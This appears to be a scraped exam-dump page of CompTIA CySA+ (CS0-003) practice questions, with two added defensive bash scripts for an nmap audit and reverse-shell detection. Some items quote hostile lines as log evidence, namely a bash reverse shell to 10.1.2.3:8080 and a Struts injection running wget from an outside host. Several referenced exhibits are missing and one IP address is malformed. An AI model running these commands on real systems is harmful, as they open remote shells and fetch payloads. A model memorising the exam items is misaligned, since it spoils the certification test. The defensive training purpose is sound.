ExamsBrite Dumps

CompTIA CyberSecurity Analyst CySA+ Certification Exam (CS0-003) Question and Answers

Last Update Oct 9, 2024
Total Questions: 327
Question 1

Which of the following threat-modeling procedures is in the OWASP Web Security Testing Guide?

Options:

A. Review of security requirements
B. Compliance checks
C. Decomposing the application
D. Security by design
Question 2

Which of the following would help to minimize human engagement and aid in process improvement in security operations?

Options:

A. OSSTMM
B. SIEM
C. SOAR
D. OWASP
Question 3

A security analyst discovers an ongoing ransomware attack while investigating a phishing email. The analyst downloads a copy of the file from the email and isolates the affected workstation from the network. Which of the following activities should the analyst perform next?

Options:

A. Wipe the computer and reinstall software.
B. Shut down the email server and quarantine it from the network.
C. Acquire a bit-level image of the affected workstation.
D. Search for other mail users who have received the same file.
Question 4

While a security analyst for an organization was reviewing logs from web servers, the analyst found several successful attempts to downgrade HTTPS sessions to use cipher modes of operation susceptible to padding oracle attacks. Which of the following combinations of configuration changes should the organization make to remediate this issue? (Select two).

Options:

A. Configure the server to prefer TLS 1.3.
B. Remove cipher suites that use CBC.
C. Configure the server to prefer ephemeral modes for key exchange.
D. Require client browsers to present a user certificate for mutual authentication.
E. Configure the server to require HSTS.
F. Remove cipher suites that use GCM.
Question 5

An attacker recently gained unauthorized access to a financial institution's database, which contains confidential information. The attacker exfiltrated a large amount of data before being detected and blocked. A security analyst needs to complete a root cause analysis to determine how the attacker was able to gain access. Which of the following should the analyst perform first?

Options:

A. Document the incident and any findings related to the attack for future reference.
B. Interview employees responsible for managing the affected systems.
C. Review the log files that record all events related to client applications and user access.
D. Identify the immediate actions that need to be taken to contain the incident and minimize damage.
Question 6

A Chief Information Security Officer (CISO) wants to disable a functionality on a business-critical web application that is vulnerable to RCE in order to maintain the minimum risk level with minimal increased cost.

Which of the following risk treatments best describes what the CISO is looking for?

Options:

A. Transfer
B. Mitigate
C. Accept
D. Avoid
Question 7

After completing a review of network activity, the threat hunting team discovers a device on the network that sends an outbound email via a mail client to a non-company email address daily at 10:00 p.m. Which of the following is potentially occurring?

Options:

A. Irregular peer-to-peer communication
B. Rogue device on the network
C. Abnormal OS process behavior
D. Data exfiltration
Question 8

An employee is no longer able to log in to an account after updating a browser. The employee usually has several tabs open in the browser. Which of the following attacks was most likely performed?

Options:

A. RFI
B. LFI
C. CSRF
D. XSS
Question 9

Which of the following techniques would be best to provide the necessary assurance for embedded software that drives centrifugal pumps at a power plant?

Options:

A. Containerization
B. Manual code reviews
C. Static and dynamic analysis
D. Formal methods
Question 10

A company brings in a consultant to make improvements to its website. After the consultant leaves, a web developer notices unusual activity on the website and submits a suspicious file containing the following code to the security team:

Which of the following did the consultant do?

Options:

A. Implanted a backdoor
B. Implemented privilege escalation
C. Implemented clickjacking
D. Patched the web server
Question 11

A security analyst is performing an investigation involving multiple targeted Windows malware binaries. The analyst wants to gather intelligence without disclosing information to the attackers. Which of the following actions would allow the analyst to achieve the objective?

Options:

A. Upload the binary to an air-gapped sandbox for analysis.
B. Send the binaries to the antivirus vendor.
C. Execute the binaries on an environment with internet connectivity.
D. Query the file hashes using VirusTotal.
Question 12

Which of the following is the best action to take after the conclusion of a security incident to improve incident response in the future?

Options:

A. Develop a call tree to inform impacted users
B. Schedule a review with all teams to discuss what occurred
C. Create an executive summary to update company leadership
D. Review regulatory compliance with public relations for official notification
Question 13

A security analyst is reviewing the findings of the latest vulnerability report for a company's web application. The web application accepts files for a Bash script to be processed if the files match a given hash. The analyst is able to submit files to the system due to a hash collision. Which of the following should the analyst suggest to mitigate the vulnerability with the fewest changes to the current script and infrastructure?

Options:

A. Deploy a WAF to the front of the application.
B. Replace the current MD5 with SHA-256.
C. Deploy an antivirus application on the hosting system.
D. Replace the MD5 with digital signatures.
Question 14

Several vulnerability scan reports have indicated runtime errors as the code is executing. The dashboard that lists the errors has a command-line interface for developers to check for vulnerabilities. Which of the following will enable a developer to correct this issue? (Select two).

Options:

A. Performing dynamic application security testing
B. Reviewing the code
C. Fuzzing the application
D. Debugging the code
E. Implementing a coding standard
F. Implementing IDS
Question 15

Which of the following does "federation" most likely refer to within the context of identity and access management?

Options:

A. Facilitating groups of users in a similar function or profile to system access that requires elevated or conditional access
B. An authentication mechanism that allows a user to utilize one set of credentials to access multiple domains
C. Utilizing a combination of what you know, who you are, and what you have to grant authentication to a user
D. Correlating one's identity with the attributes and associated applications the user has access to
Question 16

A security analyst is responding to an incident that involves a malicious attack on a network data closet. Which of the following best explains how an analyst should properly document the incident?

Options:

A. Back up the configuration file for all network devices
B. Record and validate each connection
C. Create a full diagram of the network infrastructure
D. Take photos of the impacted items
Question 17

Using open-source intelligence gathered from technical forums, a threat actor compiles and tests a malicious downloader to ensure it will not be detected by the victim organization's endpoint security protections. Which of the following stages of the Cyber Kill Chain best aligns with the threat actor's actions?

Options:

A. Delivery
B. Reconnaissance
C. Exploitation
D. Weaponization
Question 18

Which of the following items should be included in a vulnerability scan report? (Choose two.)

Options:

A. Lessons learned
B. Service-level agreement
C. Playbook
D. Affected hosts
E. Risk score
F. Education plan
Question 19

A company's security team is updating a section of the reporting policy that pertains to inappropriate use of resources (e.g., an employee who installs cryptominers on workstations in the office). Besides the security team, which of the following groups should the issue be escalated to first in order to comply with industry best practices?

Options:

A. Help desk
B. Law enforcement
C. Legal department
D. Board member
Question 20

Approximately 100 employees at your company have received a phishing email. As a security analyst, you have been tasked with handling this situation.

Review the information provided and determine the following:

1. How many employees clicked on the link in the phishing email?

2. On how many workstations was the malware installed?

3. What is the executable file name of the malware?
Question 21

A cybersecurity analyst is recording the following details:

* ID
* Name
* Description
* Classification of information
* Responsible party

In which of the following documents is the analyst recording this information?

Options:

A. Risk register
B. Change control documentation
C. Incident response playbook
D. Incident response plan
Question 22

An analyst views the following log entries:

The organization has a partner vendor with hosts in the 216.122.5.x range. This partner vendor is required to have access to monthly reports and is the only external vendor with authorized access. The organization prioritizes incident investigation according to the following hierarchy: unauthorized data disclosure is more critical than denial of service attempts, which are more important than ensuring vendor data access.

Based on the log files and the organization's priorities, which of the following hosts warrants additional investigation?

Options:

A. 121.19.30.221
B. 134.17.188.5
C. 202.180.1582
D. 216.122.5.5
Question 23

Which of the following entities should an incident manager work with to ensure correct processes are adhered to when communicating incident reporting to the general public, as a best practice? (Select two).

Options:

A. Law enforcement
B. Governance
C. Legal
D. Manager
E. Public relations
F. Human resources
Question 24

A malicious actor has gained access to an internal network by means of social engineering. The actor does not want to lose access in order to continue the attack. Which of the following best describes the current stage of the Cyber Kill Chain that the threat actor is currently operating in?

Options:

A. Weaponization
B. Reconnaissance
C. Delivery
D. Exploitation
Question 25

A security analyst is performing an investigation involving multiple targeted Windows malware binaries. The analyst wants to gather intelligence without disclosing information to the attackers. Which of the following actions would allow the analyst to achieve the objective?

Options:

A. Upload the binary to an air-gapped sandbox for analysis
B. Send the binaries to the antivirus vendor
C. Execute the binaries on an environment with internet connectivity
D. Query the file hashes using VirusTotal
Question 26

During an incident, a security analyst discovers a large amount of PII has been emailed externally from an employee to a public email address. The analyst finds that the external email is the employee's personal email. Which of the following should the analyst recommend be done first?

Options:

A. Place a legal hold on the employee's mailbox.
B. Enable filtering on the web proxy.
C. Disable the public email access with CASB.
D. Configure a deny rule on the firewall.
Question 27

Which of the following best describes the goal of a tabletop exercise?

Options:

A. To test possible incident scenarios and how to react properly
B. To perform attack exercises to check response effectiveness
C. To understand existing threat actors and how to replicate their techniques
D. To check the effectiveness of the business continuity plan
Question 28

Which of the following best describes the goal of a disaster recovery exercise as preparation for possible incidents?

Options:

A. To provide metrics and test continuity controls
B. To verify the roles of the incident response team
C. To provide recommendations for handling vulnerabilities
D. To perform tests against implemented security controls
Question 29

Which of the following concepts is using an API to insert bulk access requests from a file into an identity management system an example of?

Options:

A. Command and control
B. Data enrichment
C. Automation
D. Single sign-on
Question 30

A manufacturer has hired a third-party consultant to assess the security of an OT network that includes both fragile and legacy equipment. Which of the following must be considered to ensure the consultant does no harm to operations?

Options:

A. Employing Nmap Scripting Engine scanning techniques
B. Preserving the state of PLC ladder logic prior to scanning
C. Using passive instead of active vulnerability scans
D. Running scans during off-peak manufacturing hours
Question 31

A security analyst noticed the following entry on a web server log:

Warning: fopen (http://127.0.0.1:16) : failed to open stream: Connection refused in /hj/var/www/showimage.php on line 7

Which of the following malicious activities was most likely attempted?

Options:

A. XSS
B. CSRF
C. SSRF
D. RCE
Question 32

A security alert was triggered when an end user tried to access a website that is not allowed per organizational policy. Since the action is considered a terminable offense, the SOC analyst collects the authentication logs, web logs, and temporary files, reflecting the web searches from the user's workstation, to build the case for the investigation. Which of the following is the best way to ensure that the investigation complies with HR or privacy policies?

Options:

A. Create a timeline of events detailing the date stamps, user account, hostname and IP information associated with the activities
B. Ensure that the case details do not reflect any user-identifiable information. Password protect the evidence and restrict access to personnel related to the investigation
C. Create a code name for the investigation in the ticketing system so that all personnel with access will not be able to easily identify the case as an HR-related investigation
D. Notify the SOC manager for awareness after confirmation that the activity was intentional
Question 33

During a security test, a security analyst found a critical application with a buffer overflow vulnerability. Which of the following would be best to mitigate the vulnerability at the application level?

Options:

A. Perform OS hardening.
B. Implement input validation.
C. Update third-party dependencies.
D. Configure address space layout randomization.
Question 34

Several reports with sensitive information are being disclosed via file sharing services. The company would like to improve its security posture against this threat. Which of the following security controls would best support the company in this scenario?

Options:

A. Implement step-up authentication for administrators.
B. Improve employee training and awareness.
C. Increase password complexity standards.
D. Deploy mobile device management.
Question 35

A cybersecurity analyst is doing triage in a SIEM and notices that the time stamps between the firewall and the host under investigation are off by 43 minutes. Which of the following is the most likely scenario occurring with the time stamps?

Options:

A. The NTP server is not configured on the host.
B. The cybersecurity analyst is looking at the wrong information.
C. The firewall is using UTC time.
D. The host with the logs is offline.
Question 36

A development team is preparing to roll out a beta version of a web application and wants to quickly test for vulnerabilities, including SQL injection, path traversal, and cross-site scripting. Which of the following tools would the security team most likely recommend to perform this test?

Options:

A. Hashcat
B. OpenVAS
C. OWASP ZAP
D. Nmap
Question 37

A healthcare organization must develop an action plan based on the findings from a risk assessment. The action plan must consist of:

* Risk categorization
* Risk prioritization
* Implementation of controls

INSTRUCTIONS

Click on the audit report, risk matrix, and SLA expectations documents to review their contents.

On the Risk categorization tab, determine the order in which the findings must be prioritized for remediation according to the risk rating score. Then, assign a categorization to each risk.

On the Controls tab, select the appropriate control(s) to implement for each risk finding. Findings may have more than one control implemented. Some controls may be used more than once or not at all.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
Question 38

A security analyst is trying to detect connections to a suspicious IP address by collecting the packet captures from the gateway. Which of the following commands should the security analyst consider running?

Options:

A. grep [IP address] packets.pcap
B. cat packets.pcap | grep [IP Address]
C. tcpdump -n -r packets.pcap host [IP address]
D. strings packets.pcap | grep [IP Address]
Question 39

Which of the following techniques can help a SOC team to reduce the number of alerts related to the internal security activities that the analysts have to triage?

Options:

A. Enrich the SIEM-ingested data to include all data required for triage.
B. Schedule a task to disable alerting when vulnerability scans are executing.
C. Filter all alarms in the SIEM with low severity.
D. Add a SOAR rule to drop irrelevant and duplicated notifications.
Question 40

During an incident, some IoCs of possible ransomware contamination were found in a group of servers in a segment of the network. Which of the following steps should be taken next?

Options:

A. Isolation
B. Remediation
C. Reimaging
D. Preservation
Question 41

An organization conducted a web application vulnerability assessment against the corporate website, and the following output was observed:

Which of the following tuning recommendations should the security analyst share?

Options:

A. Set an HttpOnly flag to force communication by HTTPS
B. Block requests without an X-Frame-Options header
C. Configure an Access-Control-Allow-Origin header to authorized domains
D. Disable the cross-origin resource sharing header
Question 42

A security analyst received an alert regarding multiple successful MFA log-ins for a particular user. When reviewing the authentication logs, the analyst sees the following:

Which of the following are most likely occurring, based on the MFA logs? (Select two).

Options:

A. Dictionary attack
B. Push phishing
C. Impossible geo-velocity
D. Subscriber identity module swapping
E. Rogue access point
F. Password spray
Question 43

A cybersecurity team lead is developing metrics to present in the weekly executive briefs. Executives are interested in knowing how long it takes to stop the spread of malware that enters the network.

Which of the following metrics should the team lead include in the briefs?

Options:

A. Mean time between failures
B. Mean time to detect
C. Mean time to remediate
D. Mean time to contain
Question 44

A security analyst reviews the latest vulnerability scans and observes there are vulnerabilities with similar CVSSv3 scores but different base score metrics. Which of the following attack vectors should the analyst remediate first?

Options:

A. CVSS:3.0/AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
B. CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
C. CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
D. CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Question 45

Which of the following is the most likely reason for an organization to assign different internal departmental groups during the post-incident analysis and improvement process?

Options:

A. To expose flaws in the incident management process related to specific work areas
B. To ensure all staff members get exposure to the review process and can provide feedback
C. To verify that the organization playbook was properly followed throughout the incident
D. To allow cross-training for staff who are not involved in the incident response process
Question 46

An incident response team member is triaging a Linux server. The output is shown below:

$ cat /etc/passwd
root:x:0:0::/:/bin/zsh
bin:x:1:1::/:/usr/bin/nologin
daemon:x:2:2::/:/usr/bin/nologin
mail:x:8:12::/var/spool/mail:/usr/bin/nologin
http:x:33:33::/srv/http:/bin/bash
nobody:x:65534:65534:Nobody:/:/usr/bin/nologin
git:x:972:972:git daemon user:/:/usr/bin/git-shell

$ cat /var/log/httpd
at org.apache.catalina.core.ApplicationFilterChain.internaDoFilter(ApplicationFilterChain.java:241)
at org.apache.catalina.core.ApplicationFilterChain.internaDoFilter(ApplicationFilterChain.java:208)
at org.java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:316)
at org.java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142)
WARN [struts2.dispatcher.multipart.JakartaMultipartRequest] Unable to parse request container.getlnstance.(#wget http://grohl.ve.da/tmp/brkgtr.zip;#whoami)
at org.apache.commons.fileupload.FileUploadBase$FileUploadBase$FileItemIteratorImpl.(FileUploadBase.java:947) at org.apache.commons.fileupload.FileUploadBase.getItemiterator(FileUploadBase.java:334)
at org.apache.struts2.dispatcher.multipart.JakartaMultipartRequest.parseRequest(JakartaMultiPartRequest.java:188) org.apache.struts2.dispatcher.multipart.JakartaMultipartRequest.parseRequest(JakartaMultipartRequest.java:423)

Which of the following is the adversary most likely trying to do?

Options:

A. Create a backdoor root account named zsh.
B. Execute commands through an unsecured service account.
C. Send a beacon to a command-and-control server.
D. Perform a denial-of-service attack on the web server.
Question 47

An organization recently changed its BC and DR plans. Which of the following would best allow for the incident response team to test the changes without any impact to the business?

Options:

A. Perform a tabletop drill based on previously identified incident scenarios.
B. Simulate an incident by shutting down power to the primary data center.
C. Migrate active workloads from the primary data center to the secondary location.
D. Compare the current plan to lessons learned from previous incidents.
Question 48

A security analyst is assisting a software engineer with the development of a custom log collection and alerting tool (SIEM) for a proprietary system. The analyst is concerned that the tool will not detect known attacks and behavioral IoCs. Which of the following should be configured in order to resolve this issue?

Options:

A. Randomly generate and store all possible file hash values.
B. Create a default rule to alert on any change to the system.
C. Integrate with an open-source threat intelligence feed.
D. Manually add known threat signatures into the tool.
Question 49

The vulnerability analyst reviews threat intelligence regarding emerging vulnerabilities affecting workstations that are used within the company:

Which of the following vulnerabilities should the analyst be most concerned about, knowing that end users frequently click on malicious links sent via email?

Options:

A. Vulnerability A
B. Vulnerability B
C. Vulnerability C
D. Vulnerability D
Question 50

Which of the following describes how a CSIRT lead determines who should be communicated with and when during a security incident?

Options:

A. The lead should review what is documented in the incident response policy or plan
B. Management level members of the CSIRT should make that decision
C. The lead has the authority to decide who to communicate with at any time
D. Subject matter experts on the team should communicate with others within the specified area of expertise
Question 51

A security analyst discovers an LFI vulnerability that can be exploited to extract credentials from the underlying host. Which of the following patterns can the security analyst use to search the web server logs for evidence of exploitation of that particular vulnerability?

Options:

A. /etc/shadow
B. curl localhost
C. ; printenv
D. cat /proc/self/
Question 52

A company has the following security requirements:

* No public IPs
* All data secured at rest
* No insecure ports/protocols

After a cloud scan is completed, a security analyst receives reports that several misconfigurations are putting the company at risk. Given the following cloud scanner output:

Which of the following should the analyst recommend be updated first to meet the security requirements and reduce risks?

Options:

A. VM_PRD_DB
B. VM_DEV_DB
C. VM_DEV_Web02
D. VM_PRD_Web01
Question 53

A security analyst performs various types of vulnerability scans. Review the vulnerability scan results to determine the type of scan that was executed and if a false positive occurred for each device.

Instructions:

Select the Results Generated drop-down option to determine if the results were generated from a credentialed scan, non-credentialed scan, or a compliance scan.

For ONLY the credentialed and non-credentialed scans, evaluate the results for false positives and check the findings that display false positives. NOTE: If you would like to uncheck an option that is currently selected, click on the option a second time.

Lastly, based on the vulnerability scan results, identify the type of server by dragging the Server to the results.

The Linux Web Server, File-Print Server and Directory Server are draggable.

If at any time you would like to bring back the initial state of the simulation, please select the Reset All button. When you have completed the simulation, please select the Done button to submit. Once the simulation is submitted, please select the Next button to continue.
Question 54

Following a recent security incident, the Chief Information Security Officer is concerned with improving visibility and reporting of malicious actors in the environment. The goal is to reduce the time to prevent lateral movement and potential data exfiltration. Which of the following techniques will best achieve the improvement?

Options:

A. Mean time to detect
B. Mean time to respond
C. Mean time to remediate
D. Service-level agreement uptime
Question 55

A security analyst needs to ensure that systems across the organization are protected based on the sensitivity of the content each system hosts. The analyst is working with the respective system owners to help determine the best methodology that seeks to promote confidentiality, availability, and integrity of the data being hosted. Which of the following should the security analyst perform first to categorize and prioritize the respective systems?

Options:

A. Interview the users who access these systems.
B. Scan the systems to see which vulnerabilities currently exist.
C. Configure alerts for vendor-specific zero-day exploits.
D. Determine the asset value of each system.
Question 56

During normal security monitoring activities, the following activity was observed:

cd C:\Users\Documents\HR\Employees
takeown /f .*
SUCCESS:

Which of the following best describes the potentially malicious activity observed?

Options:

A. Registry changes or anomalies
B. Data exfiltration
C. Unauthorized privileges
D. File configuration changes
Question 57

A virtual web server in a server pool was infected with malware after an analyst used the internet to research a system issue. After the server was rebuilt and added back into the server pool, users reported issues with the website, indicating the site could not be trusted. Which of the following is the most likely cause of the server issue?

Options:

A. The server was configured to use SSL to securely transmit data.
B. The server was supporting weak TLS protocols for client connections.
C. The malware infected all the web servers in the pool.
D. The digital certificate on the web server was self-signed.
Question 58

A security analyst observed the following activity from a privileged account:

* Accessing emails and sensitive information
* Audit logs being modified
* Abnormal log-in times

Which of the following best describes the observed activity?

Options:

A. Irregular peer-to-peer communication
B. Unauthorized privileges
C. Rogue devices on the network
D. Insider attack
Question 59

An analyst has been asked to validate the potential risk of a new ransomware campaign that the Chief Financial Officer read about in the newspaper. The company is a manufacturer of a very small spring used in the newest fighter jet and is a critical piece of the supply chain for this aircraft. Which of the following would be the best threat intelligence source to learn about this new campaign?

Options:

A. Information sharing organization
B. Blogs/forums
C. Cybersecurity incident response team
D. Deep/dark web
Question 60

A systems analyst is limiting user access to system configuration keys and values in a Windows environment. Which of the following describes where the analyst can find these configuration items?

Options:

A. config.ini
B. ntds.dit
C. Master boot record
D. Registry
Question 61

Which of the following best describes the key goal of the containment stage of an incident response process?

Options:

A. To limit further damage from occurring
B. To get services back up and running
C. To communicate goals and objectives of the incident response plan
D. To prevent data follow-on actions by adversary exfiltration
Questions 62

A vulnerability management team is unable to patch all vulnerabilities found during their weekly scans. Using the third-party scoring system described below, the team patches the most urgent vulnerabilities:

Additionally, the vulnerability management team feels that the metrics Smear and Channing are less important than the others, so these will be lower in priority. Which of the following vulnerabilities should be patched first, given the above third-party scoring system?

Options:

A.  

InLoud:

Cobain: Yes

Grohl: No

Novo: Yes

Smear: Yes

Channing: No

B.  

TSpirit:

Cobain: Yes

Grohl: Yes

Novo: Yes

Smear: No

Channing: No

C.  

ENameless:

Cobain: Yes

Grohl: No

Novo: Yes

Smear: No

Channing: No

D.  

PBleach:

Cobain: Yes

Grohl: No

Novo: No

Smear: No

Channing: Yes

Questions 63

A security analyst is reviewing the logs of a web server and notices that an attacker has attempted to exploit a SQL injection vulnerability. Which of the following tools can the analyst use to analyze the attack and prevent future attacks?

Options:

A.  

A web application firewall

B.  

A network intrusion detection system

C.  

A vulnerability scanner

D.  

A web proxy

Questions 64

A cybersecurity analyst has recovered a recently compromised server to its previous state. Which of the following should the analyst perform next?

Options:

A.  

Eradication

B.  

Isolation

C.  

Reporting

D.  

Forensic analysis

Questions 65

An incident responder was able to recover a binary file through the network traffic. The binary file was also found in some machines with anomalous behavior. Which of the following processes most likely can be performed to understand the purpose of the binary file?

Options:

A.  

File debugging

B.  

Traffic analysis

C.  

Reverse engineering

D.  

Machine isolation

Questions 66

Each time a vulnerability assessment team shares the regular report with other teams, inconsistencies regarding versions and patches in the existing infrastructure are discovered. Which of the following is the best solution to decrease the inconsistencies?

Options:

A.  

Implementing credentialed scanning

B.  

Changing from a passive to an active scanning approach

C.  

Implementing a central place to manage IT assets

D.  

Performing agentless scanning

Questions 67

The Chief Executive Officer of an organization recently heard that exploitation of new attacks in the industry was happening approximately 45 days after a patch was released. Which of the following would best protect this organization?

Options:

A.  

A mean time to remediate of 30 days

B.  

A mean time to detect of 45 days

C.  

A mean time to respond of 15 days

D.  

Third-party application testing

Questions 68

While reviewing web server logs, an analyst notices several entries with the same time stamps, but all contain odd characters in the request line. Which of the following steps should be taken next?

Options:

A.  

Shut the network down immediately and call the next person in the chain of command.

B.  

Determine what attack the odd characters are indicative of.

C.  

Utilize the correct attack framework and determine what the incident response will consist of.

D.  

Notify the local law enforcement for incident response

Questions 69

An organization has established a formal change management process after experiencing several critical system failures over the past year. Which of the following are key factors that the change management process will include in order to reduce the impact of system failures? (Select two).

Options:

A.  

Ensure users document the system recovery plan prior to deployment.

B.  

Perform a full system-level backup following the change.

C.  

Leverage an audit tool to identify changes that are being made.

D.  

Identify assets with dependencies that could be impacted by the change.

E.  

Require diagrams to be completed for all critical systems.

F.  

Ensure that all assets are properly listed in the inventory management system.

Questions 70

You are a penetration tester who is reviewing the system hardening guidelines for a company. The hardening guidelines indicate the following:

    There must be one primary server or service per device.

    Only default ports should be used.

    Non-secure protocols should be disabled.

    The corporate internet presence should be placed in a protected subnet.

Instructions:

    Using the available tools, discover devices on the corporate network and the services running on these devices.

You must determine:

    The IP address of each device

    The primary server or service on each device

    The protocols that should be disabled based on the hardening guidelines

Options:

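The discovery step in this simulation is normally an nmap sweep, and the guidelines above reduce to checks that can be run against the scan result itself. The following is an added example (my own code, not part of the exam item or of any vendor tool) that audits nmap's grepable output for three of the guidelines: non-secure protocols, services running off their default port, and hosts carrying more than one primary service. The scan excerpt, the list of services treated as non-secure, and the default-port table are all assumptions constructed for the example.

```bash
#!/bin/bash
# Added example: audit nmap -oG (grepable) output against the hardening guidelines.
# SAMPLE_NMAP is a constructed excerpt, not a real scan; nmap separates the
# "Host:", "Ports:" and "Ignored State:" sections with tabs, which the regexes allow.

SAMPLE_NMAP='Host: 192.168.1.10 ()  Ports: 22/open/tcp//ssh///, 443/open/tcp//https///  Ignored State: closed (998)
Host: 192.168.1.20 ()  Ports: 21/open/tcp//ftp///, 2222/open/tcp//ssh///  Ignored State: closed (998)
Host: 192.168.1.30 ()  Ports: 23/open/tcp//telnet///, 80/open/tcp//http///, 3306/open/tcp//mysql///  Ignored State: closed (997)'

# audit_scan < nmap-grepable-output
# Prints one finding per line: "<ip> <rule> <detail>". Rules:
#   insecure-protocol  service is on the assumed non-secure list (cleartext)
#   non-default-port   service answers on a port other than its assumed default
#   multiple-services  more than one non-SSH service, i.e. more than one primary service
audit_scan() {
    awk '
        BEGIN {
            insecure["ftp"] = 1; insecure["telnet"] = 1; insecure["http"] = 1
            deflt["ssh"] = 22; deflt["ftp"] = 21; deflt["telnet"] = 23
            deflt["http"] = 80; deflt["https"] = 443; deflt["mysql"] = 3306
        }
        /^Host:/ {
            ip = $2
            sub(/.*Ports: /, "")                 # keep only the port list
            sub(/[ \t]+Ignored State:.*/, "")
            n = split($0, ports, /, */)
            primary = 0
            for (i = 1; i <= n; i++) {
                # each entry is port/state/protocol/owner/service/rpc/version/
                split(ports[i], f, "/")
                port = f[1] + 0; svc = f[5]
                if (svc in insecure)
                    print ip, "insecure-protocol", port "/" svc
                if ((svc in deflt) && deflt[svc] != port)
                    print ip, "non-default-port", port "/" svc
                if (svc != "ssh") primary++
            }
            if (primary > 1) print ip, "multiple-services", primary
        }'
}

# Live use: nmap -sV -oG - 192.168.1.0/24 | audit_scan
printf '%s\n' "$SAMPLE_NMAP" | audit_scan
```

The "one primary service per device" rule is the one a scan cannot settle on its own: SSH is excluded here as a management channel, but whether, say, a web front end and its database belong on one host is a question for the asset inventory, not the port list. The fourth guideline (internet presence in a protected subnet) needs the network diagram rather than scan output.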
Questions 71

The SOC received a threat intelligence notification indicating that an employee's credentials were found on the dark web. The user's web and log-in activities were reviewed for malicious or anomalous connections, data uploads/downloads, and exploits. A review of the controls confirmed multifactor authentication was enabled. Which of the following should be done first to mitigate impact to the business networks and assets?

Options:

A.  

Perform a forced password reset.

B.  

Communicate the compromised credentials to the user.

C.  

Perform an ad hoc AV scan on the user's laptop.

D.  

Review and ensure privileges assigned to the user's account reflect least privilege.

E.  

Lower the thresholds for SOC alerting of suspected malicious activity.

Questions 72

An analyst needs to provide recommendations based on a recent vulnerability scan:

Which of the following should the analyst recommend addressing to ensure potential vulnerabilities are identified?

Options:

A.  

SMB use domain SID to enumerate users

B.  

SYN scanner

C.  

SSL certificate cannot be trusted

D.  

Scan not performed with admin privileges

Questions 73

After identifying a threat, a company has decided to implement a patch management program to remediate vulnerabilities. Which of the following risk management principles is the company exercising?

Options:

A.  

Transfer

B.  

Accept

C.  

Mitigate

D.  

Avoid

Questions 74

A security analyst is reviewing events that occurred during a possible compromise. The analyst obtains the following log:

Which of the following is most likely occurring, based on the events in the log?

Options:

A.  

An adversary is attempting to find the shortest path of compromise.

B.  

An adversary is performing a vulnerability scan.

C.  

An adversary is escalating privileges.

D.  

An adversary is performing a password stuffing attack.

Questions 75

A cybersecurity analyst notices unusual network scanning activity coming from a country that the company does not do business with. Which of the following is the best mitigation technique?

Options:

A.  

Geoblock the offending source country

B.  

Block the IP range of the scans at the network firewall.

C.  

Perform a historical trend analysis and look for similar scanning activity.

D.  

Block the specific IP address of the scans at the network firewall

Questions 76

A security analyst identified the following suspicious entry on the host-based IDS logs:

bash -i >& /dev/tcp/10.1.2.3/8080 0>&1

Which of the following shell scripts should the analyst use to most accurately confirm if the activity is ongoing?

Options:

A.  

#!/bin/bash

nc 10.1.2.3 8080 -vv >/dev/null && echo "Malicious activity" || echo "OK"

B.  

#!/bin/bash

ps -fea | grep 8080 >/dev/null && echo "Malicious activity" || echo "OK"

C.  

#!/bin/bash

ls /opt/tcp/10.1.2.3/8080 >/dev/null && echo "Malicious activity" || echo "OK"

D.  

#!/bin/bash

netstat -antp | grep 8080 >/dev/null && echo "Malicious activity" || echo "OK"

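Every option above that greps for 8080 matches any line containing those digits, which includes a local ephemeral port such as 38080, a PID, or a byte count, and option A would itself open a connection to the attacker. The following is an added example (my own code, not the exam's) that reads the socket table from ss -antp, keeps only ESTABLISHED sockets whose peer is exactly the C2 address and port, and reports the owning process, so the verdict reflects a live connection rather than a substring hit. The socket table in the block is a constructed sample, including a curl connection whose local port contains "8080" to show the false positive a plain grep produces.

```bash
#!/bin/bash
# Added example: confirm a bash reverse shell to 10.1.2.3:8080 from socket state.
# SAMPLE_SS is a constructed `ss -antp` table, not captured from a real host; note the
# curl row whose local port contains "8080", which a plain grep would flag.

SAMPLE_SS='State  Recv-Q Send-Q Local Address:Port  Peer Address:Port  Process
LISTEN 0      128    0.0.0.0:22          0.0.0.0:*          users:(("sshd",pid=812,fd=3))
ESTAB  0      0      10.0.0.5:49152      10.1.2.3:8080      users:(("bash",pid=4242,fd=2))
ESTAB  0      0      10.0.0.5:38080      93.184.216.34:443  users:(("curl",pid=5001,fd=5))'

# find_reverse_shell C2_IP C2_PORT < ss-output
# Prints "pid=<n> <process>" for every ESTABLISHED socket whose peer is exactly
# C2_IP:C2_PORT and whose owner is a shell; exit status 0 if at least one was found.
find_reverse_shell() {
    awk -v peer="$1:$2" '
        $1 == "ESTAB" && $5 == peer {
            # Process column looks like users:(("bash",pid=4242,fd=2))
            if (match($0, /\("[^"]+",pid=[0-9]+/)) {
                s = substr($0, RSTART, RLENGTH)   # ("bash",pid=4242
                gsub(/[()"]/, "", s)              # bash,pid=4242
                split(s, f, ",")
                if (f[1] ~ /^(ba|da|k|z)?sh$/) { print f[2], f[1]; found = 1 }
            }
        }
        END { exit found ? 0 : 1 }'
}

# check_reverse_shell C2_IP C2_PORT < ss-output : prints the verdict
check_reverse_shell() {
    if hits=$(find_reverse_shell "$1" "$2"); then
        printf 'Malicious activity: %s\n' "$hits"
    else
        echo "OK"
    fi
}

# Live use on the host: ss -antp | check_reverse_shell 10.1.2.3 8080
printf '%s\n' "$SAMPLE_SS" | check_reverse_shell 10.1.2.3 8080
```

netstat prints the state as ESTABLISHED rather than ESTAB and puts the process in a PID/Program column, so the field tests need adjusting if ss is not available. A shell that has already exited, or one that reconnects on a timer, will not show up in a one-shot socket listing; run the check repeatedly or pair it with the HIDS event that raised the alert.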
Questions 77

Which of the following is a benefit of the Diamond Model of Intrusion Analysis?

Options:

A.  

It provides analytical pivoting and identifies knowledge gaps.

B.  

It guarantees that the discovered vulnerability will not be exploited again in the future.

C.  

It provides concise evidence that can be used in court

D.  

It allows for proactive detection and analysis of attack events

Questions 78

A security analyst has received an incident case regarding malware spreading out of control on a customer's network. The analyst is unsure how to respond. The configured EDR has automatically obtained a sample of the malware and its signature. Which of the following should the analyst perform next to determine the type of malware, based on its telemetry?

Options:

A.  

Cross-reference the signature with open-source threat intelligence.

B.  

Configure the EDR to perform a full scan.

C.  

